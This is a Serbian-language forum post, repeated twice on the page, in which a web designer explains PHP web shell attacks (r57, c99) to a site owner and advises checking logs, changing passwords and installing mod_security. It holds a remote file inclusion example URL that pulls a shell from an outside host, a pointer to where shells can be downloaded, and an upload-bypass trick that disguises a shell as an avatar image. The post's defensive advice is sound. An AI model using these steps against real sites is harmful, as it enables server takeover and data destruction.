DevProTalk - Pogledajte određenu poruku

twix · 17. 03. 2010.

Sve te shell scripte mozes da preuzmes, testiras i includujes sa r57.gen.tr/

Generalno ako ti je sajt lose napisan, postoji sansa da napadac pozove scriptu na sledeci nacin:

tvojsajt.com/nesto.php?inc=http://r57.gen.tr/99.txt?
(primer, umesto ucitavanja lokalnog fajla/strane/itd. preuzima i izvrsava php file direkt na tvom serveru, gde dobija pristup listanju, citanju, brisanju, izmeni itd, zavisno od permisija, generalno dovoljno mu je da moze da procita recimo config fajl i da ti zagorca zivot)

Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci...

Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code).

Sve zavisi od servera, ja sam imao dosta problema sto se tih scripti tice, jer je klijent drzao stari sajt na Veratu, gde hvala Bogu nemaju nikakav backup, ja sam uradio novi sajt, postavio umesto starog, medjutim nakon sto je "haker" obrisao kompletan sajt trazio sam od administratora da mi posalje logove, pa sam posle par sati ustanovio da nije uploadovana scripta preko mog sajta i da je ista osoba (info: zone-h.org) to vece obrisala preko 90 sajtova, predpostavljam da je na nekom sajtu pronasao propust, uploadovao shell scriptu i isao redom u foldere i brisao sve sto je uspeo (mislim na citanje config fajlova, editovanje) itd.

Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\

Ono sto sam se uverio licno, postavi recimo r57 ili c99 na bilo koji hosting, pokreni i moci ces da "hakujes" vecinu sajtova na tom serveru. Adminu iz Verata sam pre godinu-dve postavio r57 i izlistao im sve sajtove koji su bili na tom serveru gde je klijent drzao sajt, pokazao im sta i kako funkcionise cisto da bi mogli da se zastite, nakon toga sam klijentu predlozio da zakupi hosting na drugom mestu, i naravno vise nije imao tih problema, da li su me u Veratu poslusali ne znam....

17. 03. 2010.	#3
twix Web designer Professional Datum učlanjenja: 09.06.2005 Lokacija: New York Poruke: 358 Hvala: 52 724 "Hvala" u 64 poruka	Sve te shell scripte mozes da preuzmes, testiras i includujes sa r57.gen.tr/ Generalno ako ti je sajt lose napisan, postoji sansa da napadac pozove scriptu na sledeci nacin: tvojsajt.com/nesto.php?inc=http://r57.gen.tr/99.txt? (primer, umesto ucitavanja lokalnog fajla/strane/itd. preuzima i izvrsava php file direkt na tvom serveru, gde dobija pristup listanju, citanju, brisanju, izmeni itd, zavisno od permisija, generalno dovoljno mu je da moze da procita recimo config fajl i da ti zagorca zivot) Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci... Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code). Sve zavisi od servera, ja sam imao dosta problema sto se tih scripti tice, jer je klijent drzao stari sajt na Veratu, gde hvala Bogu nemaju nikakav backup, ja sam uradio novi sajt, postavio umesto starog, medjutim nakon sto je "haker" obrisao kompletan sajt trazio sam od administratora da mi posalje logove, pa sam posle par sati ustanovio da nije uploadovana scripta preko mog sajta i da je ista osoba (info: zone-h.org) to vece obrisala preko 90 sajtova, predpostavljam da je na nekom sajtu pronasao propust, uploadovao shell scriptu i isao redom u foldere i brisao sve sto je uspeo (mislim na citanje config fajlova, editovanje) itd. Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\ Ono sto sam se uverio licno, postavi recimo r57 ili c99 na bilo koji hosting, pokreni i moci ces da "hakujes" vecinu sajtova na tom serveru. Adminu iz Verata sam pre godinu-dve postavio r57 i izlistao im sve sajtove koji su bili na tom serveru gde je klijent drzao sajt, pokazao im sta i kako funkcionise cisto da bi mogli da se zastite, nakon toga sam klijentu predlozio da zakupi hosting na drugom mestu, i naravno vise nije imao tih problema, da li su me u Veratu poslusali ne znam.... Poslednja izmena od bluesman : 18. 03. 2010. u 12:09.